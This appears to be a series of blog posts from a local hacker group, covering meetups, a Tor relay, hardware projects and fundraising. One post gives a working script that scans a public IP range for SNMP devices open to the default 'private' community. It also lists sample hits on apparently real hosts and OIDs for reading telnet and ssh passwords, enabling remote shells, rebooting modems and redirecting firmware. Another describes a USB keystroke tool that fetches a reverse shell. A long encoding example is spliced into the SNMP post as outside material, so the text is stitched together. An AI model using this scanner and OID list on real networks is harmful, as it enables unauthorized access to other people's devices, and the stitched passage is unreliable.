For the cause!

As some of you might know I run a Tor exit relay from my home connection. I got this in the mail the other day:

Hello and welcome to Tor!

We’ve noticed that your Tor node dc414 has been running long enough to be flagged as “stable”. First, we would like to thank you for your contribution to the Tor network! As Tor grows, we require ever more nodes to improve browsing speed and reliability for our users. Your node is helping to serve the millions of Tor clients out there.

As a node operator, you may be interested in the Tor Weather service, which sends important email notifications when a node is down or your version is out of date. We here at Tor consider this service to be vitally important and greatly useful to all node operators. If you’re interested in Tor Weather, please visit the following link to register:

https://weather.torproject.org/

You might also be interested in the tor-announce mailing list, which is a low volume list for announcements of new releases and critical security updates. To join, visit the following address:

https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-announce

Additionally, since you are running as an exit node, you might be interested in Tor’s Legal FAQ for Relay Operators (https://www.torproject.org/eff/tor-legal-faq.html.en) and Mike Perry’s blog post on running an exit node (https://blog.torproject.org/blog/tips-running-exit-node-minimal-harassment).

Thank you again for your contribution to the Tor network! We won’t send you any further emails unless you subscribe.

Disclaimer: If you have no idea why you’re receiving this email, we sincerely apologize! You shouldn’t hear from us again.

Yay my node is now stable!! Now we just need to get one running on the dc414 server 🙂

dc414 donations bucket 2.0

A while back we started using a bucket to collect cash donations at meetings, and for a while I have been wanting to trick it out. So I was keeping an eye out for things to add other than blinking lights; then cmoney came home with a Powerball advertisement thing from her gas station that has an electric pendulum thing. I wish I had a picture of it, but I didn’t have the foresight to take one before I took it apart.

So anyway I got right to work on making the bucket pimp. First I made a little board with a 555 timer blinking light circuit on it.

Then I put some lights on it and wired the pendulum thing to it.

And hot glued it all to the lid of the bucket.

Here is what it looks like all together.

Ok, that’s it, I hope you think it’s cool. If you don’t, go fuck your mom.

August meeting awesomeness

Klaiviel started us off by giving us a nice show of the binary key card hotel locks popular overseas, showed us a 3D-printed key for one of his locks, and explained pick-proof locks from the 40s that are no longer used but highly effective, and how to make them today using regular locks. Then he showed us why he is the second best key impressionist in the world: he made a working key for a lock right in front of us and gave us step-by-step instructions on how to do it ourselves.

I stepped in and gave a quick demo of how I made our new and improved donations bucket, which I will be making a blog post on later. Darkwind came packing with an Alfa wifi antenna hooked up to a satellite dish! This made a killer directional wifi antenna; we took it up to the roof of Bucketworks and got signals from all over, including the moon 😛 Ngharo hooked it up to his lappy and cracked a few networks 🙂

After the roof party was over and we got back downstairs, Castor gave a DEFCON 20 badge hacking demo and showed us how to turn our badges into any other badge type we wanted, then showed us how to make the LEDs on the badge flash out words and stuffs. Then we all just started bullshitting and talking about upcoming projects.

Cmoney couldn’t make it out, so I took a few pictures that you can view here. Congrats to darkwind and faraday for winning the dc414 free junk giveaway!!

Good times with snmp

At the last meeting dw5304 gave a demo on SNMP scanning and gaining access to things you shouldn’t have access to with a few home-brew Windows apps he coded up. It’s been a while since I messed with SNMP, but his demo got me back into it, so I made a little Python script to scan subnets for open SNMP servers with the read/write string set to private. Here is the code:

#! /usr/bin/env python
from scapy.all import *

base = "69.2.1."  # IP range to scan minus the last octet.
# Note: a successful Get only proves "private" is accepted for reads; that it is
# really the read/write string is an assumption until a Set is tried.
with open('/tmp/snmp_output.txt', 'w+') as f:
    for i in range(1, 255):
        ip = base + str(i)
        print(ip)
        # SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0) with community "private".
        p = IP(dst=ip) / UDP(dport=161, sport=39445) / SNMP(
            community="private",
            PDU=SNMPget(id=1416992799,
                        varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
        pkt = sr1(p, timeout=1, verbose=0)
        # Ignore ICMP port-unreachable replies; only a real SNMP answer counts.
        if pkt and SNMP in pkt:
            # Read the value straight from the parsed varbind instead of splitting
            # the sprintf() text, whose format changes between scapy versions.
            descr = pkt[SNMP].PDU.varbindlist[0].value.val
            if isinstance(descr, bytes):
                descr = descr.decode("utf-8", "replace")
            line = pkt[IP].src + " - " + descr
            print(line)
            f.write(line + "\n")
print("\nDONE!!!!!!!!!!!!!!!\n")

It’s a little hacked together and could use improvement, but it works (feel free to send in any improvements you make). It puts the IPs of all the servers it finds in /tmp/snmp_output.txt along with their system description (sysDescr) enumerated via SNMP. Here is a sample output:

69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006
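To show what that scapy one-liner actually puts on the wire, here is an added example (not code from the original post or from DC414): the same SNMPv1 GetRequest for sysDescr.0 hand-encoded in BER with only the standard library, plus a proper parser for the GetResponse in place of string-splitting scapy’s sprintf() output. The response it parses is constructed inline from the first line of the sample output above, so it runs offline; the request id and community are the ones the script uses.

```python
# Added example, not code from the original post: the SNMPv1 GetRequest for sysDescr.0
# that the scapy one-liner sends, BER-encoded by hand, plus a real GetResponse parser.
SYS_DESCR = "1.3.6.1.2.1.1.1.0"                        # the OID the script polls

def tlv(tag, body):                                    # short-form length is enough
    assert len(body) < 128                             # for the messages built here
    return bytes([tag, len(body)]) + body

def encode_int(v):                                     # two's-complement INTEGER
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def encode_oid(dotted):                                # base-128 sub-identifiers
    parts = [int(x) for x in dotted.split(".")]
    body = bytearray([40 * parts[0] + parts[1]])
    for p in parts[2:]:
        chunk = [p & 0x7F]
        while p > 0x7F:
            p >>= 7
            chunk.insert(0, (p & 0x7F) | 0x80)
        body += bytes(chunk)
    return tlv(0x06, bytes(body))

def snmp_msg(community, oid, value_tlv=b"\x05\x00", pdu_tag=0xA0, request_id=1416992799):
    varbind = tlv(0x30, encode_oid(oid) + value_tlv)   # defaults: GetRequest, NULL value
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
              + tlv(0x30, varbind))                    # id, error-status, error-index
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)  # version 0

def decode(buf):                                       # BER -> nested (tag, value) list
    out, pos = [], 0
    while pos < len(buf):
        tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
        if ln & 0x80:                                  # long-form length, ln-128 bytes
            ln, pos = int.from_bytes(buf[pos:pos + ln - 128], "big"), pos + ln - 128
        val = buf[pos:pos + ln]
        out.append((tag, decode(val) if tag & 0x20 else val))   # 0x20 = constructed
        pos += ln
    return out

def parse_response(pkt):                               # -> (request id, error-status, text)
    [(_, [_, _, (tag, pdu)])] = decode(pkt)            # SEQUENCE{version, community, PDU}
    if tag != 0xA2:                                    # 0xA2 = GetResponse PDU
        raise ValueError("not a GetResponse PDU (tag 0x%02x)" % tag)
    (_, rid), (_, err), _, (_, varbinds) = pdu         # id, error-status, error-index, list
    (_, [(_, _), (vtag, value)]) = varbinds[0]         # first VarBind: OID, value
    text = value.decode(errors="replace") if vtag == 0x04 else None
    return int.from_bytes(rid, "big", signed=True), int.from_bytes(err, "big", signed=True), text

SAMPLE_RESPONSE = snmp_msg("private", SYS_DESCR, tlv(0x04, b"Ruckus Wireless Inc (C) 2006"),
                           pdu_tag=0xA2)               # constructed GetResponse, not a capture
```

The 44 bytes from snmp_msg("private", SYS_DESCR) are exactly the UDP payload the script sends to port 161, so the same layout is what you will see in a capture of that traffic.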

Once you find a few servers you can do snmpwalks on them and scour the output for juicy info.
Here are some good OIDs to look for and/or set (I found most of this online and got some from dw5304):

  • ip.ipForwarding.0 = tells you if it’s forwarding packets or not (useful to DoS a device)
  • 1.3.6.1.2.1.4.24.2.1.1 = ipForwardingDest
  • sysName.0 = device name
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 = EnableTelnetServer
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0 = telnetIpStackInterfaces
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0 = telnetUserName
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0 = telnetPassword
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 = telnetServerControl
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0 = telnetSessionIp
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0 = telnetSessionInProgress
  • 1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0 = telnetForceUserLogout
  • 1.3.6.1.2.1.1.1.0 = System description
  • 1.3.6.1.2.1.1.3.0 = Modem up time
  • 1.3.6.1.2.1.4 = Some useful information (walk)
  • 1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext)
  • 1.3.6.1.2.1.4.20.1.3.0 = HFC subnet (getnext)
  • 1.3.6.1.2.1.2.2.1.6.2 = MAC
  • 1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth
  • 1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth
  • 1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk)
  • 1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem
  • 1.3.6.1.2.1.69.1.4.4.0 = TFTP configuration file server IP
  • 1.3.6.1.2.1.69.1.4.5.0 = Configuration file name
  • 1.3.6.1.2.1.69.1.3.5.0 = Current firmware
  • 1.3.6.1.2.1.69.1.4.2.0 = DHCP server IP
  • 1.3.6.1.2.1.69.1.4.3.0 = Time server IP
  • 1.3.6.1.2.1.69.1.5.8.1.7 = View log (walk)
  • 1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream frequency
  • 1.3.6.1.2.1.69.1.4.5.0 = Image file
  • 1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (getnext)

Read / Write OIDs:

  • 1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1 = boot now)
  • 1.3.6.1.2.1.69.1.3.1.0 = TFTP firmware server IP
  • 1.3.6.1.2.1.69.1.3.2.0 = Firmware filename
  • 1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1 = update now, 2 = update on boot, 3 = disable updates)
  • 1.3.6.1.2.1.69.1.5.2.0 = SNMP traps server IP (0.0.0.0 = disabled)
  • 1.3.6.1.2.1.69.1.5.3.0 = SNMP traps status (1 = enabled, 4 = disabled)
  • 1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP port
  • 1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP traps port
  • 1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML server status (1 = enabled, 2 = disabled)

Other OIDs:

  • 1.3.6.1.2.1.1.5.0 = Modem type
  • 1.3.6.1.3.83.1.1.4.0 = Cable modem serial number
  • 1.3.6.1.3.83.1.4.5.0 = Alternate OID for config file
  • 1.3.6.1.3.83.1.4.3.0 = Provisional server
  • 1.3.6.1.2.1.1.6.0 = Area string
  • 1.3.6.1.2.1.4.20.1.3 + (HFC IP) = Subnet (example: 1.3.6.1.2.4.20.1.3.10.169.53.245)
  • 1.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC
  • 1.3.6.1.2.1.2.2.1.6.1 = Cable modem USB MAC
  • 1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default gateway MAC address
  • 1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max burst up
  • 1.3.6.1.2.1.2.2.1.6.5 = CPE MAC
  • 1.3.6.1.4.1.1166.1.19.3.1.17.0 i 1 or 0 = enable or disable webif
  • 1.3.6.1.4.1.4413.2.2.2.1.1.4.1 = reflects the IP stack interfaces on which a ssh
  • 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = reflects the user name which will be allowed ssh access
  • 1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = reflects the password which will be allowed ssh access
  • 1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = start or stop the ssh server
  • 1.3.6.1.4.1.4413.2.2.2.1.1.4.7 = terminate ssh session

You can find a lot more online. Enjoy and happy hacking 🙂

Arduino Windows Attack Tool

A few meetings back I demoed my Arduino Windows attack tool. The Arduino and shield emulate a keyboard when plugged into a PC. Once triggered, it opens the DOS edit program, writes some VBScript to a file called go.vbs, then runs it using wscript. The script downloads a payload from a web server; in the case of the demo it was a reverse shell that connects back to a nc listener from msf. I got the idea from the Social-Engineering Toolkit Teensy USB HID attack, but I don’t have/want a Teensy, so I looked and looked for an Arduino version. All I could find was a USB keyboard lib, so my value add was porting it to the Arduino.

Here is the USB lib I used.

Here is the schematic for the shield (I added a button on pin 12):

Here is the code for the Arduino:

And there you have it, my Arduino Windows attack tool. It’s a little messy and hacked together, but it works. Enjoy 🙂

Many thanx to SilkyPantsDan, Rancid Bacon, and Practical Arduino

3D Printer Fund

There has been a lot of buzz about 3D printers over the last year. Prices are coming down and resolution has been increasing. Klaiviel, our resident lockpicking guru, is attempting to start a business around it. We feel that DC414 as a whole needs to get its hands on this technology, so we’re starting a 3D printer fund, starting now.

There are many options to go with, but we want to get the ball rolling while research happens in parallel. The price range we’re looking at is between $500 and $1,000 for a quality printer.

This won’t happen without help from people like you. Once purchased / assembled / hacked, our goal is to make the printer accept jobs online. We’d queue up jobs and have a webcam feed to view progress when printing remotely. Notifications would be sent to the job’s author on start, completion, and possibly other metrics we can get out of the printer.

  • Donate $25+ gets you free stickers
  • Donate $50+ gets you a free shirt
  • Donate $100+ gets you free prints for 6 months
  • Donate $150+ gets you free prints and priority for 6 months

Any size donation gets you on the thank you list.

As of now we have $233 in the fund. Make your donation now (look to the right) and let’s get this ball rolling.

June meeting recap

June’s meeting was great! More new faces, lots of beer, and plenty of pizza 🙂 Ngharo got things started by making a few announcements, like our new VPN that is available for donating members, and asking everyone what they are hacking ATM and what they wanna hack next. I was up next and talked about the new server and some of the sections of the site. Then Ulic gave us all the 411 on the Flamer virus sweeping the Middle East and some of its unique features. dw5304 took over and gave a sweet demo on how to hack/mod the Xbox 360, complete with code and solder points. We got some great pictures this time thanx to cmoney, which you can view here. Congrats to nikto, Tony, and Ulic for winning the dc414 free junk giveaway.

Here is nikto and his dc414 junk 🙂

May meeting recap

May’s meeting was off the hook, one of our best yet! Lots of new faces, which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave an awesome demo on sniffing pagers. It’s crazy to see all the pager traffic that is still out there. Then I showed off my Arduino Windows attack tool and pwned a Windows 7 box; there will be a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures, but my phone was full of fail and didn’t save any of them 🙁 so no pictures of the meeting this time, sorry. I promise to do better next time 😛 later.